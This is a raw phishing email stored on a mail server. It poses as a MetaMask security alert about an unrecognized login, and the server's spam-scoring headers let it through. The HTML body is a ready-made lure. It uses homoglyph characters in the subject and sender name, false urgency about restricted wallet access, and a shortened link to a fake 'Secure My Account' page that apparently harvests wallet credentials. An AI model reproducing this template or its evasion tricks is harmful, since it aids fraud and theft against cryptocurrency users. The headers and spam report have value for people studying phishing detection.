File: /home/mahdetej/mail/mahdetejarat.com/info/new/1754375099.M402762P1583518.milad.7ho.st,S=8055,W=8220
Return-Path: <postmaster@18a48c33e1.nxcli.io>
Delivered-To: info@mahdetejarat.com
Received: from milad.7ho.st
by milad.7ho.st with LMTP
id +kKkFbujkWieKRgAri92KA
(envelope-from <postmaster@18a48c33e1.nxcli.io>)
for <info@mahdetejarat.com>; Tue, 05 Aug 2025 09:54:59 +0330
Return-path: <postmaster@18a48c33e1.nxcli.io>
Envelope-to: info@mahdetejarat.com
Delivery-date: Tue, 05 Aug 2025 09:54:59 +0330
Received: from cloudhost-9412708.us-midwest-1.nxcli.net ([8.29.155.116]:50600)
by milad.7ho.st with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
(Exim 4.98.1)
(envelope-from <postmaster@18a48c33e1.nxcli.io>)
id 1ujB6N-00000006dpY-1I6d
for info@mahdetejarat.com;
Tue, 05 Aug 2025 09:54:54 +0330
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=default; d=18a48c33e1.nxcli.io;
b=CyNbZNitRTHYNiCrOEYxV9b2Rm2nQMiZA9TF3856o0PN9v+c5+oiQwBQ07Wwz9/N+EHJBURJCPC+mvfAjAkYSr+tVFPGgKRGKn6zbcPpz57iTDRSVt7zVD9NV0A15taiTE5Nq8kt58ay++MRkOo84SWhHY1VjxofwAZzmHTJEvPVXx7o+kv7qx/v7xbiOSvYYCyjsIVOwFfwePNol1h7eMPT2su0UDSDi9W8fPwzcnyT5KDJrejfG4x90jwcQf6zS1V0GVsmaSdsifbdYzWi+iNV1597IUA+WcmIKyKnMFhMYYb7QXh4CNeFCF6QLwcpmkpmzZyWYBDfdGNYAoIPlQ==;
h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=18a48c33e1.nxcli.io; h=
date:message-id:to:subject:from:reply-to:mime-version
:content-type:list-unsubscribe; s=default; bh=paa406zkUKHSg4Rper
aAJjKEWBQ1Jv4CCl8tixxTJSw=; b=ZuxKX/AaLcXBEDUrz4hs1/suVAb7r8pVHH
IOLkR0T1m+EIZmnKXcb83o1beMoDeLtbV4DgFs5a9m+/im5kDDeVycVb+7V0pZLJ
UJJdIEL5hhGj6MIaxqgRkYAj2EEpw+SZLKHtETbfEfc8IKxjKRgzjKWnCVaftFtl
WB39DAvR74zr52++tmUmm/9xDuGa+eg6VUYBiWADTidV1zvMvzk0ScKkfaTdO68q
SomAx9UdDtfDJDPtm/neaK13L62Ztl+9LFCvG2qa3IEmOos3UtgTluqmVWJuL7sy
04GqUKkX3JmfujyIxZlZH11n2gIrMVURqXXgaEZaCB9/E3KliYLA==
Received: (qmail 15324 invoked by uid 10089); 5 Aug 2025 06:21:35 +0000
Date: 5 Aug 2025 06:21:35 +0000
Message-ID: <20250805062135.15320.qmail@cloudhost-9412708.us-midwest-1.nxcli.net>
To: info@mahdetejarat.com
Subject: Sеcurity Аlert — Unrecоgnized Lоgin Attеmpt
X-PHP-Originating-Script: 10089:raw.php
From: "MetаMаsk" <18v2b2xe@hro.io>
Reply-To: 18v2b2xe@hro.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@18v2b2xe@hro.io>
X-Spam-Status: No, score=4.0, No
X-Spam-Score: 40
X-Spam-Bar: ++++
X-Ham-Report: Spam detection software, running on the system "milad.7ho.st",
has NOT identified this incoming email as spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
root\@localhost for details.
Content preview: Security Alert: Unrecognized Login Attempt We detected a
login attempt to your MetaMask account from a new device or location. If this
was not you, your account may be at risk. No, this wasn’t me � [...]
Content analysis details: (4.0 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked.
See
http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
for more information.
[URI: t.co]
[URI: nxcli.io]
[URI: githubusercontent.com]
0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[8.29.155.116 listed in sa-accredit.habeas.com]
0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[8.29.155.116 listed in bl.score.senderscore.com]
0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[8.29.155.116 listed in sa-trusted.bondedsender.org]
0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid
3.0 KAM_DMARC_REJECT DKIM has Failed or SPF has failed on the message and
the domain has a DMARC reject policy
0.1 DKIM_INVALID DKIM or DK signature exists, but is not valid
0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict
Alignment
0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level mail
domains are different
0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.7 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
0.0 HTML_MESSAGE BODY: HTML included in message
0.0 KAM_SHORT Use of a URL Shortener for very short URL
X-Spam-Flag: NO
X-YourOrg-MailScanner-Information: Please contact the ISP for more information
X-YourOrg-MailScanner-ID: 1ujB6N-00000006dpY-1I6d
X-YourOrg-MailScanner: Found to be clean
X-YourOrg-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
score=4.016, required 5, DKIM_INVALID 0.10, DKIM_SIGNED 0.10,
HTML_IMAGE_ONLY_20 0.70, HTML_MESSAGE 0.00, KAM_DMARC_REJECT 3.00,
KAM_DMARC_STATUS 0.01, KAM_SHORT 0.00, MIME_HTML_ONLY 0.10,
RCVD_IN_VALIDITY_CERTIFIED_BLOCKED 0.00,
RCVD_IN_VALIDITY_RPBL_BLOCKED 0.00,
RCVD_IN_VALIDITY_SAFE_BLOCKED 0.00, URIBL_BLOCKED 0.00)
X-YourOrg-MailScanner-SpamScore: ssss
X-YourOrg-MailScanner-From: postmaster@18a48c33e1.nxcli.io
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body style="margin:0; padding:0; background:#f9fafb;">
<center style="font-family:Arial, sans-serif; color:#222; padding:20px;">
<!-- Logo (hosted on a trusted CDN) -->
<img
src="https://raw.githubusercontent.com/MetaMask/brand-resources/master/SVG/metamask-fox.svg"
alt="MetaMask Logo"
width="48"
style="display:block; margin:0 auto 16px; border:none; outline:none;"
/>
<!-- Headline -->
<strong style="font-size:18px; color:#f6851b; display:block; margin-bottom:12px;">
Security Alert: Unrecognized Login Attempt
</strong>
<!-- Body copy -->
<span style="font-size:14px; line-height:1.4; display:block; margin-bottom:16px;">
We detected a login attempt to your MetaMask account from a new device or location.<br/>
If this was <strong>not you</strong>, your account may be at risk.
</span>
<!-- Call-to-action link as visible text -->
<a
href="https://t.co/sjarY7MGS5?id=7286597243221609372-3091"
style="
display:inline-block;
font-size:14px;
font-weight:bold;
color:#ffffff;
background-color:#f6851b;
text-decoration:none;
padding:10px 20px;
border-radius:4px;
"
>
No, this wasn’t me – Secure My Account
</a>
<!-- Footer copy -->
<span style="font-size:12px; color:#666666; display:block; margin:16px 0 0;">
Your wallet access may be restricted until you verify this activity.<br/>
If you did not request this, please ignore this message.
</span>
<span style="font-size:12px; color:#aaaaaa; display:block; margin-top:8px;">
— MetaMask Security Team
</span>
</center>
</body>
</html>